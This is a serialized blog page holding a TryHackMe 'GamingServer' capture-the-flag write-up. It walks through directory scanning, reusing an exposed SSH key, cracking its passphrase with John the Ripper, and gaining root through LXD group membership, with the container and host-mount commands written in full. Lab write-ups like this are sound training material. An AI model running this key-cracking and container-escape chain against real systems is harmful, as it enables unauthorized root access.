[{"data":1,"prerenderedAt":535},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-gamingserver-writeup":3,"surround-\u002F2025\u002Ftryhackme-gamingserver-writeup":526},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":519,"_id":520,"_source":521,"_file":522,"_stem":523,"_extension":524,"_original_dir":525},"\u002F2025\u002Ftryhackme-gamingserver-writeup","2025",false,"","TryHackMe - GamingServer","A step-by-step guide to completing the TryHackMe GamingServer room. This walkthrough covers reconnaissance, gaining initial access, and escalating privileges using the LXD vulnerability.","2025-09-05T08:18:55.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"3 min read",2.3,138000,460,{"type":20,"children":21,"toc":512},"root",[22,28,44,51,55,77,81,97,101,106,111,115,137,141,145,165,169,173,179,200,204,225,229,242,246,252,265,269,282,286,291,333,495,508],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fgamingserver",[40],"nofollow",[42],{"type":33,"value":43},"gaming.thm",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,67,69,75],{"type":33,"value":59},"As you can see, we have an ",{"type":23,"tag":61,"props":62,"children":64},"code",{"className":63},[],[65],{"type":33,"value":66},"http",{"type":33,"value":68}," service and an ",{"type":23,"tag":61,"props":70,"children":72},{"className":71},[],[73],{"type":33,"value":74},"ssh",{"type":33,"value":76}," service. First, let's examine the website.",{"type":23,"tag":24,"props":78,"children":80},{"src":79},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F3.jpg",[],{"type":23,"tag":29,"props":82,"children":83},{},[84,86,95],{"type":33,"value":85},"When we inspect the website's source code, we obtain the username ",{"type":23,"tag":61,"props":87,"children":92},{"className":88,"id":90,"style":91},[89],"example-info","just-like-this","color: #4DFFBE",[93],{"type":33,"value":94},"john",{"type":33,"value":96},".",{"type":23,"tag":24,"props":98,"children":100},{"src":99},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":102,"children":103},{},[104],{"type":33,"value":105},"Now, let's perform a directory scan to find more information and see what we can discover.",{"type":23,"tag":107,"props":108,"children":110},"copy",{"code":109},"feroxbuster -eBEg --auto-tune --scan-limit 3 -u http:\u002F\u002Fgaming.thm --wordlist \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fbig.txt",[],{"type":23,"tag":24,"props":112,"children":114},{"src":113},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":116,"children":117},{},[118,120,127,129,135],{"type":33,"value":119},"From our directory scan, we find the ",{"type":23,"tag":61,"props":121,"children":124},{"className":122,"id":90,"style":123},[89],"color: #efb11d",[125],{"type":33,"value":126},"\u002Fsecret",{"type":33,"value":128}," and ",{"type":23,"tag":61,"props":130,"children":132},{"className":131,"id":90,"style":123},[89],[133],{"type":33,"value":134},"\u002Fuploads",{"type":33,"value":136}," directories. Let's check them out.",{"type":23,"tag":24,"props":138,"children":140},{"src":139},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F6.jpg",[],{"type":23,"tag":24,"props":142,"children":144},{"src":143},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":146,"children":147},{},[148,150,156,158,164],{"type":33,"value":149},"Here, we get the ",{"type":23,"tag":61,"props":151,"children":153},{"className":152},[],[154],{"type":33,"value":155},"\u002Fsecret\u002FsecretKey",{"type":33,"value":157}," file. We see that it contains an SSH key. Additionally, we find a wordlist at ",{"type":23,"tag":61,"props":159,"children":161},{"className":160},[],[162],{"type":33,"value":163},"\u002Fuploads\u002Fdict.lst",{"type":33,"value":96},{"type":23,"tag":24,"props":166,"children":168},{"src":167},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F8.jpg",[],{"type":23,"tag":24,"props":170,"children":172},{"src":171},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F9.jpg",[],{"type":23,"tag":45,"props":174,"children":176},{"id":175},"initial-access",[177],{"type":33,"value":178},"Initial Access",{"type":23,"tag":29,"props":180,"children":181},{},[182,184,190,192,198],{"type":33,"value":183},"Now, let's save the SSH key to a file named ",{"type":23,"tag":61,"props":185,"children":187},{"className":186},[],[188],{"type":33,"value":189},"id_rsa",{"type":33,"value":191}," and set its permissions using ",{"type":23,"tag":61,"props":193,"children":195},{"className":194},[],[196],{"type":33,"value":197},"chmod 600 id_rsa",{"type":33,"value":199},". Then, let's connect via SSH using this key and the username we found.",{"type":23,"tag":24,"props":201,"children":203},{"src":202},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":205,"children":206},{},[207,209,215,217,223],{"type":33,"value":208},"We are prompted for a password for the SSH key. Let's try to crack it using ",{"type":23,"tag":61,"props":210,"children":212},{"className":211},[],[213],{"type":33,"value":214},"John the Ripper",{"type":33,"value":216},". (The room provided a wordlist, but I didn't use it as the password was already in John's default wordlist). Now, let's get the hash with ",{"type":23,"tag":61,"props":218,"children":220},{"className":219},[],[221],{"type":33,"value":222},"ssh2john",{"type":33,"value":224}," and crack it.",{"type":23,"tag":24,"props":226,"children":228},{"src":227},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F11.jpg",[],{"type":23,"tag":29,"props":230,"children":231},{},[232,234,240],{"type":33,"value":233},"We obtain the password ",{"type":23,"tag":61,"props":235,"children":237},{"className":236,"id":90,"style":91},[89],[238],{"type":33,"value":239},"letmein",{"type":33,"value":241},". Now, let's connect again via SSH. And we have successfully logged in.",{"type":23,"tag":24,"props":243,"children":245},{"src":244},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F12.jpg",[],{"type":23,"tag":45,"props":247,"children":249},{"id":248},"privilege-escalation",[250],{"type":33,"value":251},"Privilege Escalation",{"type":23,"tag":29,"props":253,"children":254},{},[255,257,263],{"type":33,"value":256},"Now, let's use ",{"type":23,"tag":61,"props":258,"children":260},{"className":259},[],[261],{"type":33,"value":262},"linpeas.sh",{"type":33,"value":264}," to find possible ways to escalate our privileges. (I hosted the script on my Apache server and will download it from there on the target machine.)",{"type":23,"tag":24,"props":266,"children":268},{"src":267},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F13.jpg",[],{"type":23,"tag":29,"props":270,"children":271},{},[272,274,280],{"type":33,"value":273},"Upon checking the output, we see that our user is in the ",{"type":23,"tag":61,"props":275,"children":277},{"className":276,"id":90,"style":91},[89],[278],{"type":33,"value":279},"lxd",{"type":33,"value":281}," group.",{"type":23,"tag":24,"props":283,"children":285},{"src":284},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F14.jpg",[],{"type":23,"tag":29,"props":287,"children":288},{},[289],{"type":33,"value":290},"This suggests we can use the LXD Privilege Escalation vulnerability. Let's proceed step-by-step.",{"type":23,"tag":292,"props":293,"children":295},"alert",{"type":294},"error",[296,305,317],{"type":23,"tag":297,"props":298,"children":299},"template",{"v-slot:title":7},[300],{"type":23,"tag":29,"props":301,"children":302},{},[303],{"type":33,"value":304},"LXD Privilege Escalation",{"type":23,"tag":29,"props":306,"children":307},{},[308,310,315],{"type":33,"value":309},"LXD is a tool for managing containers on Linux systems. By default, users in the ",{"type":23,"tag":61,"props":311,"children":313},{"className":312},[],[314],{"type":33,"value":279},{"type":33,"value":316}," group can create and manage containers without root privileges.",{"type":23,"tag":318,"props":319,"children":320},"ul",{},[321],{"type":23,"tag":322,"props":323,"children":324},"li",{},[325,331],{"type":23,"tag":326,"props":327,"children":328},"strong",{},[329],{"type":33,"value":330},"Problem",{"type":33,"value":332},": This group provides full control over containers (e.g., adding disks, configuring networks). When misused, this privilege can compromise the security of the host system.",{"type":23,"tag":334,"props":335,"children":336},"ol",{},[337,351,371,384,479],{"type":23,"tag":322,"props":338,"children":339},{},[340,342,349],{"type":33,"value":341},"To exploit this vulnerability, we need to create a container on the target system, but there is no image available. First, let's download an image. I will use the ",{"type":23,"tag":36,"props":343,"children":346},{"href":344,"rel":345},"https:\u002F\u002Fgithub.com\u002Fsaghul\u002Flxd-alpine-builder\u002Fblob\u002Fmaster\u002Falpine-v3.13-x86_64-20210218_0139.tar.gz",[40],[347],{"type":33,"value":348},"Alpine Linux",{"type":33,"value":350}," image due to its small size.",{"type":23,"tag":322,"props":352,"children":353},{},[354,356,362,363,367],{"type":33,"value":355},"Let's download the image to our local machine and transfer it to the target system using ",{"type":23,"tag":61,"props":357,"children":359},{"className":358},[],[360],{"type":33,"value":361},"scp -i id_rsa alpine-v3.13-x86_64-20210218_0139.tar.gz  john@gaming.thm:\u002Ftmp",{"type":33,"value":96},{"type":23,"tag":24,"props":364,"children":366},{"src":365},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F15.jpg",[],{"type":23,"tag":24,"props":368,"children":370},{"src":369},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F16.jpg",[],{"type":23,"tag":322,"props":372,"children":373},{},[374,376,380],{"type":33,"value":375},"Now, let's import the image into the LXD environment and assign it an alias.",{"type":23,"tag":107,"props":377,"children":379},{"code":378},"lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias alpine",[],{"type":23,"tag":24,"props":381,"children":383},{"src":382},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F17.jpg",[],{"type":23,"tag":322,"props":385,"children":386},{},[387,389],{"type":33,"value":388},"Now, let's start and configure the container using the following commands in sequence:",{"type":23,"tag":318,"props":390,"children":391},{},[392,421,455,466],{"type":23,"tag":322,"props":393,"children":394},{},[395,402,404],{"type":23,"tag":61,"props":396,"children":399},{"className":397,"id":90,"style":398},[89],"color: #77BEF0",[400],{"type":33,"value":401},"lxc init alpine ignite -c security.privileged=true",{"type":33,"value":403},": Create a new container named \"ignite\" from the \"alpine\" image.\n",{"type":23,"tag":318,"props":405,"children":406},{},[407],{"type":23,"tag":322,"props":408,"children":409},{},[410,412,419],{"type":33,"value":411},"The ",{"type":23,"tag":61,"props":413,"children":416},{"className":414,"id":90,"style":415},[89],"color: #EA5B6F",[417],{"type":33,"value":418},"security.privileged=true",{"type":33,"value":420}," parameter allows the container to run in privileged mode. This is a critical step, as privileged containers have greater access to the host system's resources.",{"type":23,"tag":322,"props":422,"children":423},{},[424,430,432,438,440],{"type":23,"tag":61,"props":425,"children":427},{"className":426,"id":90,"style":398},[89],[428],{"type":33,"value":429},"lxc config device add ignite mydevice disk source=\u002F path=\u002Fmnt\u002Froot recursive=true",{"type":33,"value":431},": Mount the host machine's root directory (\u002F) to the ",{"type":23,"tag":61,"props":433,"children":435},{"className":434,"id":90,"style":91},[89],[436],{"type":33,"value":437},"\u002Fmnt\u002Froot",{"type":33,"value":439}," directory inside the container.\n",{"type":23,"tag":318,"props":441,"children":442},{},[443],{"type":23,"tag":322,"props":444,"children":445},{},[446,447,453],{"type":33,"value":411},{"type":23,"tag":61,"props":448,"children":450},{"className":449,"id":90,"style":415},[89],[451],{"type":33,"value":452},"recursive=true",{"type":33,"value":454}," parameter ensures that subdirectories are also included. This is the most critical part of the attack, as it provides access to the entire filesystem of the host from within the container.",{"type":23,"tag":322,"props":456,"children":457},{},[458,464],{"type":23,"tag":61,"props":459,"children":461},{"className":460,"id":90,"style":398},[89],[462],{"type":33,"value":463},"lxc start ignite",{"type":33,"value":465},": Start the container.",{"type":23,"tag":322,"props":467,"children":468},{},[469,471,477],{"type":33,"value":470},"And ",{"type":23,"tag":61,"props":472,"children":474},{"className":473,"id":90,"style":398},[89],[475],{"type":33,"value":476},"lxc exec ignite \u002Fbin\u002Fsh",{"type":33,"value":478},": Start a shell session inside the container.",{"type":23,"tag":322,"props":480,"children":481},{},[482,484,489,491],{"type":33,"value":483},"Now, from our shell, let's navigate to the ",{"type":23,"tag":61,"props":485,"children":487},{"className":486},[],[488],{"type":33,"value":437},{"type":33,"value":490}," directory where we mounted the host machine's root directory.",{"type":23,"tag":24,"props":492,"children":494},{"src":493},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F18.jpg",[],{"type":23,"tag":29,"props":496,"children":497},{},[498,500,506],{"type":33,"value":499},"From here, we can navigate to the ",{"type":23,"tag":61,"props":501,"children":503},{"className":502},[],[504],{"type":33,"value":505},"\u002Froot",{"type":33,"value":507}," directory to get the flag.",{"type":23,"tag":24,"props":509,"children":511},{"src":510},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-GamingServer-writeup\u002F19.jpg",[],{"title":7,"searchDepth":513,"depth":513,"links":514},4,[515,517,518],{"id":47,"depth":516,"text":50},2,{"id":175,"depth":516,"text":178},{"id":248,"depth":516,"text":251},"markdown","content:posts:2025:tryhackme-GamingServer-writeup.md","content","posts\u002F2025\u002Ftryhackme-GamingServer-writeup.md","posts\u002F2025\u002Ftryhackme-GamingServer-writeup","md","\u002Fposts",[527,531],{"_path":528,"title":529,"date":530},"\u002F2025\u002Ftryhackme-b3dr0ck-writeup","TryHackMe - b3dr0ck","2025-09-04T15:20:00.000Z",{"_path":532,"title":533,"date":534},"\u002F2025\u002Ftryhackme-archangel-writeup","TryHackMe - Archangel","2025-09-08T17:50:48.000Z",1777022958819]